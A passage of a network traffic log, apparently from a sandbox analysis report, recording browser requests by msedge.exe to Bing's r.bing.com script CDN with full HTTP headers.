sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:22:38 GMT
etag: 0x8DCDC6149E5871E
content-length: 585
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: sbJ/BFEx86eoWqpF1v/OBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 150042bc-501e-0002-6231-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=107104
expires: Thu, 05 Dec 2024 15:53:18 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2uwtCbrcHmq7VZthjm2jjm8hlTk.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/2uwtCbrcHmq7VZthjm2jjm8hlTk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 17 Oct 2024 18:45:59 GMT
etag: 0x8DCEEDBF16716B4
content-length: 529
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: /wEAo+jqTIFShGVUYgIPGQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7560eb88-c01e-0043-6d65-21c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=160607
expires: Fri, 06 Dec 2024 06:45:01 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/9l6lkKg4UtXN9lxLEhjNZw02VrM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/9l6lkKg4UtXN9lxLEhjNZw02VrM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:27:41 GMT
etag: 0x8DCE8C259F3388F
content-length: 2764
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: L4IMT8TGTUrIF0wSTP5Fdg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 24fd6671-101e-0063-4f6d-1eacb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b7901002.1731409690.ac32f298
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=303409
expires: Sat, 07 Dec 2024 22:25:03 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e3
timing-allow-origin: *
GET

https://r.bing.com/rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/3s0czFTJyV5b3KCC7geWICWvvPs.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:37:29 GMT
etag: 0x8DCEC87A3ED1870
content-length: 1320
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: F/FfhRxYlnuZTsg2+6i7VA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ca21ec6-201e-0042-2cf7-21c184000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1731634268.8ed0935a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=396097
expires: Mon, 09 Dec 2024 00:09:51 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e4
timing-allow-origin: *
GET

https://r.bing.com/rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/wNhUjm3kl_kvyfrio44J6j1zdYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:11:33 GMT
etag: 0x8DCDC681EDAC2C8
content-type: text/javascript; charset=utf-8
content-md5: ItmcJflzfwBqUrBIYlGXpQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e18b7d35-c01e-0061-2e2c-17ae4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 257
cache-control: public, no-transform, max-age=158879
expires: Fri, 06 Dec 2024 06:16:13 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/lwQThTlaI10v50gbypuOTf2JDcM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/lwQThTlaI10v50gbypuOTf2JDcM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:21 GMT
etag: 0x8DCE8C3014FD967
content-length: 4656
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 04jjFZu5YZ+50YtQ9rT+Jw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f50e5572-b01e-004c-5be7-312d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731630724.1b1a6367
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=46715
expires: Wed, 04 Dec 2024 23:06:49 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e7
timing-allow-origin: *
GET

https://r.bing.com/rp/QbhTTihqpIpuQBHI4z0cMxYJtFg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/QbhTTihqpIpuQBHI4z0cMxYJtFg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:21:57 GMT
etag: 0x8DCDC61311C1C65
content-length: 450
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rtxvs37lrHH+iqrm7oyJaw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 17cde3d5-f01e-002d-6756-176950000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=212399
expires: Fri, 06 Dec 2024 21:08:13 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12e8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/wJ4ypLxMemRfvxvJkUCpuYEBwew.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:23 GMT
etag: 0x8DCE8C3263B07E9
content-length: 825
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 80z3xDtWBrHD/WXVZ9HXMQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9b208278-901e-001f-14de-1a3180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b9777b5c.1731595927.9be59fb
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=347254
expires: Sun, 08 Dec 2024 10:35:48 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ec
timing-allow-origin: *
GET

https://r.bing.com/rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/RvRBoZ5KQDNHwbHfo-_ZBZIoYQo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:24:00 GMT
etag: 0x8DCDC617A7BA9F4
content-length: 792
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3LAdJkykvHw5zfSSu6AY7w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 700c2b99-401e-003f-586e-175d4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=296264
expires: Sat, 07 Dec 2024 20:25:58 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12f0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/bzAVZoOHiaJeSbLoUcTPF4HPvJQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:28 GMT
etag: 0x8DCE8C305642E82
content-length: 1453
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: o0P31pAM8ZjqucLAMWUkZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bfb76974-801e-0000-2cde-1aea90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.88777b5c.1731530177.14e30ca
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=33575
expires: Wed, 04 Dec 2024 19:27:49 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12f1
timing-allow-origin: *
GET

https://r.bing.com/rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:01 GMT
etag: 0x8DCE8C3193D5444
content-length: 9007
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: K6mYdssyGKO2Fe2fyESYTg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c2a1a5f9-c01e-0007-4fde-1a1c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4c1a1202.1731504800.1715c6f
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=80699
expires: Thu, 05 Dec 2024 08:33:13 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12f2
timing-allow-origin: *
GET

https://r.bing.com/rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/CuoJ-XSESmq5e-S0atX4JdNgEbQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:56 GMT
etag: 0x8DCDC5E41B5114A
content-length: 259
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: jDpfrkHEWPKiRt+7YgCBFw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a2401f4c-b01e-002a-684f-179fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=106232
expires: Thu, 05 Dec 2024 15:38:46 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12fa
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/cXhWvHAhnTbr0lPlUZIG8zGWEBo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/cXhWvHAhnTbr0lPlUZIG8zGWEBo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:25 GMT
etag: 0x8DCE8C3036FD2BF
content-length: 5417
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: IRgRM2ba/kYhkf4jfaPDIg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8262e0b0-801e-0022-58de-1a84a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a2901002.1728548578.2f46bd5
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=314737
expires: Sun, 08 Dec 2024 01:33:51 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1304
timing-allow-origin: *
GET

https://r.bing.com/rp/DEGubgGL2FRn6DYv2uliY5J6UtQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/DEGubgGL2FRn6DYv2uliY5J6UtQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:58 GMT
etag: 0x8DCE8C28868FDF1
content-length: 7787
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: LwNtXQoKoWLxNOhazxslgg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4dcf302a-b01e-0021-42bf-3687a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1731666935.67d3c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=271407
expires: Sat, 07 Dec 2024 13:31:41 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af131e
timing-allow-origin: *
GET

https://r.bing.com/rp/-WojEs4J45nLzTV3A_IE46NwGIw.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/-WojEs4J45nLzTV3A_IE46NwGIw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:25:44 GMT
etag: 0x8DCEC85FFE98016
content-length: 1221
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4W608hEYSd9XWsIbLyDVTQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 963d422b-001e-0077-3b63-216fd1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=294343
expires: Sat, 07 Dec 2024 19:53:57 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af131f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/pKZggcIocDTpN8MVdCs5AqdtJbo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/pKZggcIocDTpN8MVdCs5AqdtJbo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:33:25 GMT
etag: 0x8DCE8C3270C6A76
content-length: 3070
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: m5u/fuJEHXQtdBut+xG9dQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2ecb5441-d01e-0013-09dd-31df71000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.95777b5c.1731632100.a932c74
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=403007
expires: Mon, 09 Dec 2024 02:05:01 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1320
timing-allow-origin: *
GET

https://r.bing.com/rp/RMRjctrz--TNvbEliu0umBztyAQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/RMRjctrz--TNvbEliu0umBztyAQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:30:57 GMT
etag: 0x8DCE8C2CF400D7F
content-type: text/javascript; charset=utf-8
content-md5: DTDL0ta8Z4w5qdHa9ZUG/Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b7db009a-d01e-005c-08fe-1a1b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2636
cache-control: public, no-transform, max-age=167662
expires: Fri, 06 Dec 2024 08:42:36 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
